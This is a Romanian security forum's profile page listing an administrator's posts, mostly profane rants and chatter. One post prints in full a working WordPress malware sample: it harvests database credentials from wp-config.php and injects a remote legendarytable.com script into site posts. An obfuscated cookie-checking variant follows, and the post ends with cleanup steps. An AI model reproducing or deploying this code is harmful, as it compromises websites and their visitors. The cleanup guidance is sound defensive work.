Jump to content

aelius

Administrators
  • Posts

    4764
  • Joined

  • Last visited

  • Days Won

    243

Everything posted by aelius

  1. S-a activat scriptu Blowjob :)))) Ce terminati frate
  2. E de la pluginul "Elementor" Aici este sursa ce "infesteaza" jucariile: <?php error_reporting(0); ini_set('display_errors', 0); ini_set('max_execution_time', 0); echo "ssqqss>>>"; $d = $_SERVER['DOCUMENT_ROOT'] . "/"; $files = array(); for ($i = 0;$i < 3;$i++) { try { $az = shell_exec('find ' . $d . ' -name "wp-config.php"'); $az2 = explode("\n", $az); foreach ($az2 as $file) { $fil = explode("/wp-config.php", $file); $fil = $fil[0] . "/wp-config.php"; array_push($files, $fil); } $d = $d . "../"; } catch(Exception $e) { } } $l = "/"; for ($i = 0;$i < 3;$i++) { try { $it = new RecursiveDirectoryIterator($_SERVER['DOCUMENT_ROOT'] . $l); $display = Array( 'php' ); $search = Array( 'wp-config.php' ); $files_ar = array(); foreach (new RecursiveIteratorIterator($it) as $file) { if (strpos($file->getFilename() , 'wp-config.php') !== false) { array_push($files, $file->getPathname()); } } $l .= "../"; } catch(Exception $e) { } } $files = array_unique($files); foreach ($files as $file) { make_index_blog($file); } die(); function get_var_reg($pat, $text) { if ($c = preg_match_all("/" . $pat . "/is", $text, $matches)) { return $matches[1][0]; } return ""; } function getijstonemoretime($path) { } function make_index_blog($path) { echo "iii->>try:" . $path . "<br />"; $az = shell_exec('cat ' . $path); if (strpos($az, "DB_PASSWORD") !== false) { } else { } if (strpos($az, "DB_PASSWORD") !== false) { sqldo($az); } } function sqldo($content) { $siteurl = "null"; if (strpos($content, "DB_NAME") !== false) { $db = get_var_reg("DB_NAME['|\"].*?,.*?['|\"](.*?)['|\"]", $content); $host = get_var_reg("DB_HOST['|\"].*?,.*?['|\"](.*?)['|\"]", $content); $user = get_var_reg("DB_USER['|\"].*?,.*?['|\"](.*?)['|\"]", $content); $pass = get_var_reg("DB_PASSWORD['|\"].*?,.*?['|\"](.*?)['|\"]", $content); $conn = new mysqli($host, $user, $pass); if ($conn->connect_error) { echo $conn->connect_error; } else { $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%options%'"; $result = $conn->query($q) or die($conn->error); while ($row = $result->fetch_assoc()) { $result5 = $conn->query("SHOW COLUMNS FROM " . $db . "." . $row["TABLE_NAME"] . " LIKE 'option_name'"); if ($result5->num_rows > 0) { $q2 = "SELECT option_value FROM " . $row["TABLE_SCHEMA"] . "." . $row["TABLE_NAME"] . " where option_name='siteurl' LIMIT 1 "; $result2 = $conn->query($q2) or var_dump($conn->error); while ($row2 = $result2->fetch_assoc()) { $val = $row2['option_value']; $siteurl = $val; echo "iii->>find222:" . $siteurl . "<br />"; if (strpos($siteurl, "://") !== false) { $k = file_get_contents($siteurl); if (strpos($k, "legendarytable") !== false) { echo "iii->>contains:" . $siteurl . "<br />"; } else { $q9 = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%posts%'"; $result9 = $conn->query($q9) or die($conn->error); while ($row9 = $result9->fetch_assoc()) { $q8 = "SELECT post_content FROM " . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . " LIMIT 1 "; $result8 = $conn->query($q8) or var_dump($conn->error); while ($row8 = $result8->fetch_assoc()) { $val8 = $row8['post_content']; if (strpos($val8, "legendarytable") === false) { $q3 = "UPDATE " . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . " set post_content = CONCAT(post_content,\"<script src='https://jack.legendarytable.com/news.js?v=1.9.9' type='text/javascript'></script>\") WHERE post_content NOT LIKE '%legendarytable%'"; $conn->query($q3); echo "iii->>" . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . "<br />"; } else { echo "iii->>222ALREADY:" . $row9["TABLE_SCHEMA"] . "." . $row9["TABLE_NAME"] . "<br />"; } } } } } } } } } $conn->close(); } return $siteurl; } function search_file_index($dir, $file_to_search) { $files = @scandir($dir); if ($files == false) { $dir = substr($dir, 0, -3); if (strpos($dir, '../') !== false) { search_file_index($dir, $file_to_search); return; } if ($dir == $_SERVER['DOCUMENT_ROOT'] . "/") { search_file_index($dir, $file_to_search); return; } } foreach ($files as $key => $value) { $path = realpath($dir . DIRECTORY_SEPARATOR . $value); if (!is_dir($path)) { if (strpos($value, $file_to_search) !== false && (strpos($value, ".ph") !== false || strpos($value, ".htm")) !== false) { make_index_upload($path); } } else if ($value != "." && $value != "..") { search_file_index($path, $file_to_search); } } } Prin fisiere, o alta versiune (cea cu cookie check) arata asa: $v=chr(112).chr(114).chr(101).chr(103).chr(95).chr(109).chr(97).chr(116).chr(99).chr(104); if(!$v(chr(35).chr(119).chr(111).chr(114).chr(100).chr(112).chr(114).chr(101).chr(115).chr(115).chr(95).chr(97).chr(100).chr(109).chr(105).chr(110).chr(124).chr(119).chr(112).chr (45).chr(115).chr(101).chr(116).chr(116).chr(105).chr(110).chr(103).chr(115).chr(124).chr(119).chr(111).chr(114).chr(100).chr(112).chr(114).chr(101).chr(115).chr(115).chr(95).chr (108).chr(111).chr(103).chr(103).chr(101).chr(100).chr(35).chr(105),implode(" ",array_keys($_COOKIE)))){echo chr(60).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(32). chr(115).chr(114).chr(99).chr(61).chr(39).chr(104).chr(116).chr(116).chr(112).chr(115).chr(58).chr(47).chr(47).chr(116).chr(114).chr(105).chr(99).chr(107).chr(46).chr(108).chr(10 1).chr(103).chr(101).chr(110).chr(100).chr(97).chr(114).chr(121).chr(116).chr(97).chr(98).chr(108).chr(101).chr(46).chr(99).chr(111).chr(109).chr(47).chr(110).chr(101).chr(119).c hr(115).chr(46).chr(106).chr(115).chr(63).chr(118).chr(61).chr(54).chr(46).chr(51).chr(46).chr(50).chr(39).chr(32).chr(116).chr(121).chr(112).chr(101).chr(61).chr(39).chr(116).ch r(101).chr(120).chr(116).chr(47).chr(106).chr(97).chr(118).chr(97).chr(115).chr(99).chr(114).chr(105).chr(112).chr(116).chr(39).chr(62).chr(60).chr(47).chr(115).chr(99).chr(114). chr(105).chr(112).chr(116).chr(62);} Pentru a verifica checksum la fisierele din core, va recomand wp-cli Exemplu: ./wp --allow-root core verify-checksums Warning: File doesn't verify against checksum: wp-login.php Warning: File doesn't verify against checksum: wp-admin/index.php Warning: File doesn't verify against checksum: wp-admin/admin.php Warning: File doesn't verify against checksum: wp-admin/admin-ajax.php Warning: File should not exist: wp-admin/try.php Error: WordPress installation doesn't verify against checksums. Ar trebui sa dea cam asa: ./wp --allow-root core verify-checksums Success: WordPress installation verifies against checksums. Este necesara si eliminarea scripturilor din posts (wp_posts). Se poate identifica foarte usor printr-un query mysql: select * from wp_posts where post_content like '%news.js%'; De asemenea, se poate elimina din wp_posts utilizand replace. Aici vedeti ca pot fi mai multe versiuni. Puteti extinde cautarea dupa %script% sau/si legendarytable si apoi faceti replace la ce e necesar update wp_posts set post_content = replace(post_content, "<script src='https://jack.legendarytable.com/news.js?v=1.9.9' type='text/javascript'></script>", ""); Mai este inca o versiune ce isi instaleaza 2 plugine (inactive) prin care isi pot rula diverse. O alta versiune isi face check la cookies. Acolo unde exista cookies, nu face redirect catre alte site. Vizeaza doar vizitatori noi pe care-i redirecteaza Sfat: 1. Nu mai instalati toate låbile de plugine 2. Folositi in plm Content-Security-Policy! :)))
  3. Era tare sa poti da tag la politia de pe forum. Si la aia de la SRI intrati aici precum gandacii pe langa conductele de termoficare :))))))
  4. Buna ideea. Cu GeoIP mod pt. apache GeoIPEnable On # doamne futa-va pe toti si scapam de greutati :)) SetEnvIf GEOIP_COUNTRY_CODE CN BlockCountry SetEnvIf GEOIP_COUNTRY_CODE RU BlockCountry SetEnvIf GEOIP_COUNTRY_CODE UA BlockCountry SetEnvIf GEOIP_COUNTRY_CODE IN BlockCountry <RequireAll> Require all granted Require not env BlockCountry </RequireAll>
  5. Pai si bugete pentru firmele neamurilor? Ei nu cauta solutii man. Cauta sa ofere contractele si sa mulga bani
  6. Intre timp, romania educata https://www.romaniatv.net/primarie-din-valcea-datoare-la-trupa-de-lautari-se-vand-microbuzele-scolare-pentru-plata-sumei-uriase-altfel-nu-putem_6455043.html
  7. Oricum sunt inutile site-urile guvernamentale. Poti chiar spune ca sunt site-uri folosite la frauda, la cat va fura statul roman ticalos. ♥️ fratii mei rusi!
  8. This topic was created five years ago Look here: - https://wiki.ipfire.org/configuration/firewall/blockshodan Also, you can read here something: https://www.csoonline.com/article/3020108/blocking-shodan-isnt-some-sort-of-magical-fix-that-will-protect-your-data.html
  9. Asta e curs cum sa iti ia casa foc. Nu se respecta niciun fel de normativ/standard acolo. E instalatie electrica sau lucreaza la ma-sa la grajd :)))) - Conductorii par de 1,5 mm toti - Sigurantele sunt de 16 AMPERI curba C (pentru consumatori inductivi, nu rezistivi, asa cum avem in casa la majoritatea lucrurilor). Pentru instalatiile domestice se folosesc curba A sau B. E logic, ai curba C pentru ca un consumator inductiv consuma de pana la 6 ori curentul absorbit la pornire (o sa sara siguranta aia la 60 de amperi, atunci cand toata instalatia facuta pe 1.5mm sectiune o sa arda in flacari) - Nu exista niciun fel de siguranta diferentiala - A ocupat mai mult de 70% din cutie cu ele. - Conductorii litati nu se dezizoleaza cu caterul - Este interzisa cositorirea conductorilor in instalatii electrice. Acolo se folosesc cleme speciale de tip wago (prinderea se face mecanic, altfel cositorul acela o sa curga la prima supra sarcina iar suprafata de contact este de ~0,3mm, ori de cate ori l-ar rasuci labarul) - A pus deasupra sarme intre sigurante in loc de busbar (9 sigurante de 16 amperi pe un singur conductor de 1,5mm)
  10. Salutari, Are cineva un contact pe unde e nevoie pentru introducerea feed-urilor de la site-urile de stiri in ro.yahoo.com? Ofer 1000 euro, banul jos daca se incheie deal-ul (cu finalizare, ca la curve)
  11. :)))))))))))) Ba nene, nu mai fumati nasoale inainte de a intreba ceva. Cum adica sa pierzi vechimea? E rubrica acolo cu data obtinerii categoriei, da-o in pastele ma-sii S-a desfacut in doua si ai pierdut doar mecla sau cum parastas s-a pierdut mecla dar ai verso Sa-l reînmuiești poate
  12. Tu cred ca nu ai idee care e diferenta dintre mono si stereo. Stereo nu inseamna doua boxe si atat. Rezumat la tiganul de pe youtube:
  13. Salut, Man, e putin greu de inteles ce oferi. - Din "Pret 1 usd / articol" nu inteleg ce lungime are, etc. - De ce lucrezi la pret de indian? - De ce accepti doar plata in crypto? - Cum adica livrezi in cateva minute si orice limba? (sunt generate, traduse automat, sau cum?) Nu te intreb sa-ti stric vreun meci pe aici cu anuntul tau (tot eu l-am si aprobat), doar sa fie clar si poate am si eu nevoie de servicii de genul
  14. https://anonymouspiatraneamt.com/sfantul-efrem-cel-nou-ocrotitorul-fisierelor/ bå 🤣
  15. Consumati curent, poluati si ucideti balenele si ursii polari. Huooo, pacatosilor 🤣
  16. Banuiesc ce ai vrea sa faci. Ai schema lui electronica? Sau ce anume vrei sa stii? Poti vorbi la modul general, nu direct (mod de (ne)functionare)
  17. Adica s-a rupt receiverul de la tastatura. Microsoft All-In-One este RF (Wireless), nicidecum Bluetooth. Nu iti va functiona cu niciun alt receiver wireless pentru ca vin special facute asa (fiecare dongle functioneaza doar cu tastatura din acel set).
  18. Sosoaca si HAUR. Cam ce poti schimba tara de prosti si nesimtiti? Din vina politicienilor sunt romanii asa: - Arunca chistocu pe jos - Isi lasa peturile de bere si ambalajele de mici la padure - Scuipa pe jos si sparg seminte - Sunt nesimtiti si oligofreni. Le explici ca ciuma rosie a fost si e un cancer si ei continua sa voteze psd. (aviz pensionarilor) - Vor un presedinte romulan, sa apara la capatos si maruta, sa rada cu ei - Traiesc din ajutoare sociale. E prea mica diferenta dintre salariul minim si ajutorul social - Se vaita permanent, scarpinandu-se la maciuca Fac pariu ca multi nici nu stiu ce atributii are un presedinte. Probabil multi se asteapta sa vina primaria si sa le faca curat in curte
  19. @Dragos esti amuzant cu GDPR-ul. Nicio institutie din Romania nu respecta GDPR. Nici macar Autoritatea Națională de Supraveghere a Prelucrării Datelor cu Caracter Personal. Mai mult decat atat, au cumetrii si protejeaza tiganii care fac spam si au contracte cu institutiile statului roman ticalos si preacurvit. Tot ce se fura in mod scarbavnic in tara lui peste prajit in ulei de motor, se face cu sprijinul SRI. Aia asa, pe langa afacerile de pe aeroport si matraseniile cu bagarea pumnlului in gura diversilor operator economici pentru a facilita manarelile altora. Stiati ca intai se fac interceptari si apoi se obtin ordine judecatoresti? Dar ca intregul sistem de justitie e corupt precum curvele ce sug pula prin cabinele telefonice? Judecatorii au gramada de dosare penale facute si sunt amenintati ca intra pe rol daca nu dau verdictele dorite. 33 de ani de hotie si labageala. Bataie de joc pe banul public. Ca tot a venit vorba de comunicatii. Unde pula mea e site-ul MCSI.RO ? S-au dat 63.000 de euro unei firme cu activitatea inghetata sa puna online o pula cu urechi facuta in joomla. A stat online 4 luni, apoi au mai dat inca 30.000 de euro pentru refacerea lui. Au abandonat la scurt timp proiectul si au redirectat catre site-ul oficial din laba, comunicatii.gov.ro. Asta are certificatul SSL expirat din 21 mai 2021. Sat fara caini si curve proaste pe posturi bine platite. Aia e romania coaie. Treziti-va si plecati de acolo cat mai puteti inca. S-a intors Inchizitia
  20. de ce, esti prea urat si nu vrei sa te vada lumea? Fa-ti revolut si iti generezi carduri virtuale pentru cumparaturi.
  21. Si Idiotul e tot de Dostoievski :))))) Acum e fun, ca e topicul inchis. In linistea noptii le poti auzi brainurile cum isi iau restart
×
×
  • Create New...